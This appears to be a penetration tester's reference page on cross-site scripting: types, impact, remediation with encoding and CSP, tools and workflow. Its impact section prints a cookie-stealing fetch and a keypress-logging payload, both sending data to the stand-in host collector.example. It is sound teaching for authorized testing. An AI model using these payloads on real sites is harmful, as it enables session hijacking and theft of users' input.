XSS¶
Cross-Site Scripting: injecting JavaScript into a web application so it runs in other users' browsers.
Why It Matters¶
XSS runs attacker-controlled script in the context of a trusted site, which can steal session cookies, capture keystrokes, perform actions as the victim, or deface content. It appears wherever user input is reflected or stored without proper encoding.
Reference¶
Types¶
| Type | Description |
|---|---|
| Reflected | Input in a request is echoed into the response without encoding; delivered via a crafted link |
| Stored (persistent) | Payload is saved by the app (database, comment, profile) and runs for every visitor |
| DOM-based | Client-side JavaScript writes untrusted input into the page (for example via eval or innerHTML) |
| Blind | Payload fires somewhere the tester cannot see, confirmed with an out-of-band tool like XSS Hunter |
Proving and Measuring Impact¶
A harmless popup proves the injection point; the others show real impact in an authorized test.
// proof of concept
alert('XSS');
// session theft (sends the victim's cookie to a collector)
fetch('https://collector.example/steal?c=' + btoa(document.cookie));
// keylogger
document.onkeypress = function(e){ fetch('https://collector.example/k?k=' + btoa(e.key)); };
Filter-evasion payloads (polyglots that fire in multiple contexts) are catalogued in the PortSwigger and PayloadsAllTheThings cheat sheets linked below.
Remediation¶
- Context-aware output encoding when rendering user input (HTML, attribute, JavaScript, URL contexts each differ)
- Content Security Policy (CSP) to restrict where scripts can load from and block inline script
- Input validation with allowlists
- Use framework features that auto-encode output, and avoid
eval,innerHTML, anddocument.writeon untrusted data
Tools¶
| Tool | Use |
|---|---|
| Burp Suite / OWASP ZAP | Finding and testing injection points |
| XSS Hunter | Catching blind XSS out of band |
How I Use It¶
I confirm an injection point with a harmless alert, identify the context it lands in (HTML body, attribute, or script), then pick an encoding-appropriate payload. For reporting I demonstrate concrete impact such as session theft in a controlled way, and recommend output encoding plus CSP as the fix.